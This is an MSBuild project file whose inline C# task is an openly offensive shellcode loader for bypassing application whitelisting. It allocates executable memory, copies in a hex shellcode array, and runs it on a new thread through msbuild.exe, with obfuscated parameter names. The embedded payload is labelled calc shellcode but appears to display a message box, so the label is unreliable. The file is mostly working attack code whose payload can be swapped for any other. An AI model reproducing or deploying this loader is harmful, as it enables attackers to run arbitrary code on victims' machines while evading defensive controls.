shellCodeTest_msbuild.csproj

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe ShellCodeInjector.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Evan Pena, Twitter: @evan_pena2003 -->
  <!-- Idea taken from http://subt0x10.blogspot.ie/2016/09/bypassing-application-whitelisting.html-->
  <!-- License: BSD 3-Clause -->
  <Target Name="ShellCodeInjector">
   <FragmentExample />   
  </Target>
  <UsingTask
    TaskName="FragmentExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>	
      <Code Type="Class" Language="cs">
        <![CDATA[
			using System;
			using Microsoft.Build.Framework;
			using Microsoft.Build.Utilities;			
			using System.Net;
			using System.Net.Sockets;
			using System.Runtime.InteropServices;
			using System.Text;
			using System.IO;
				
			public class FragmentExample :  Task, ITask
			{
				public override bool Execute()
				{					
					ShellCodeInject.Main();
					return true;
				}
			}
			
			public class ShellCodeInject
			{
				[DllImport("kernel32")]
				private static extern IntPtr VirtualAlloc(UInt32 JWmoIlFhPkGN, UInt32 UzWUXeiqddon, UInt32 szYzablY, UInt32 GXqpQXZYHpUiQ);
				[DllImport("kernel32")]
				private static extern IntPtr CreateThread(UInt32 cfYPJVtsoTj, UInt32 BzaNozPQLx, IntPtr YcjYxbv, IntPtr FmjdKEI, UInt32 WalIOQWiqTD, ref UInt32 VmRrcdmoX);
				[DllImport("kernel32")]
				private static extern UInt32 WaitForSingleObject(IntPtr xGtvlmms, UInt32 TgXuJhLpycZ);

				public static void Main()
				{										
					//x64 Calc Shellcode
					string strShellCode = InputToByteArrayString("0x33,0xc9,0x64,0x8b,0x49,0x30,0x8b,0x49,0x0c,0x8b,0x49,0x1c,0x8b,0x59,0x08,0x8b,0x41,0x20,0x8b,0x09,0x80,0x78,0x0c,0x33,0x75,0xf2,0x8b,0xeb,0x03,0x6d,0x3c,0x8b,0x6d,0x78,0x03,0xeb,0x8b,0x45,0x20,0x03,0xc3,0x33,0xd2,0x8b,0x34,0x90,0x03,0xf3,0x42,0x81,0x3e,0x47,0x65,0x74,0x50,0x75,0xf2,0x81,0x7e,0x04,0x72,0x6f,0x63,0x41,0x75,0xe9,0x8b,0x75,0x24,0x03,0xf3,0x66,0x8b,0x14,0x56,0x8b,0x75,0x1c,0x03,0xf3,0x8b,0x74,0x96,0xfc,0x03,0xf3,0x33,0xff,0x57,0x68,0x61,0x72,0x79,0x41,0x68,0x4c,0x69,0x62,0x72,0x68,0x4c,0x6f,0x61,0x64,0x54,0x53,0xff,0xd6,0x33,0xc9,0x57,0x66,0xb9,0x33,0x32,0x51,0x68,0x75,0x73,0x65,0x72,0x54,0xff,0xd0,0x57,0x68,0x6f,0x78,0x41,0x01,0xfe,0x4c,0x24,0x03,0x68,0x61,0x67,0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x54,0x50,0xff,0xd6,0x57,0x68,0x72,0x6c,0x64,0x21,0x68,0x6f,0x20,0x57,0x6f,0x68,0x48,0x65,0x6c,0x6c,0x8b,0xcc,0x57,0x57,0x51,0x57,0xff,0xd0,0x57,0x68,0x65,0x73,0x73,0x01,0xfe,0x4c,0x24,0x03,0x68,0x50,0x72,0x6f,0x63,0x68,0x45,0x78,0x69,0x74,0x54,0x53,0xff,0xd6,0x57,0xff,0xd0");
					IntPtr ITGMyKKAUUm = VirtualAlloc(0,(UInt32)strShellCode.Length, 0x1000, 0x40);
					byte[] shellcode = StringToByteArray(strShellCode);					

					Marshal.Copy(shellcode, 0, ITGMyKKAUUm, shellcode.Length);
					IntPtr DYtvdEXCykZ = IntPtr.Zero; UInt32 UgAJRevmsLwnO = 0; IntPtr qhaCJWwoK = IntPtr.Zero;
					DYtvdEXCykZ = CreateThread(0, 0, ITGMyKKAUUm, qhaCJWwoK, 0, ref UgAJRevmsLwnO);
					WaitForSingleObject(DYtvdEXCykZ, 0xFFFFFFFF);
					
				}
				
				public static string InputToByteArrayString(string input)
				{
					string strShellCode = input.Replace("0x", "");
					strShellCode = strShellCode.Replace(",", "");
					return strShellCode;
				}

				public static byte[] StringToByteArray(String hex)
				{
					int NumberChars = hex.Length;
					byte[] bytes = new byte[NumberChars / 2];
					for (int i = 0; i < NumberChars; i += 2)
						bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
					return bytes;
				}

				public static string ByteArrayToString(byte[] ba)
				{
					StringBuilder hex = new StringBuilder(ba.Length * 2);
					foreach (byte b in ba)
						hex.AppendFormat("{0:x2}", b);
					return hex.ToString();
				}
			}
        ]]>
      </Code>
    </Task>
	</UsingTask>
</Project>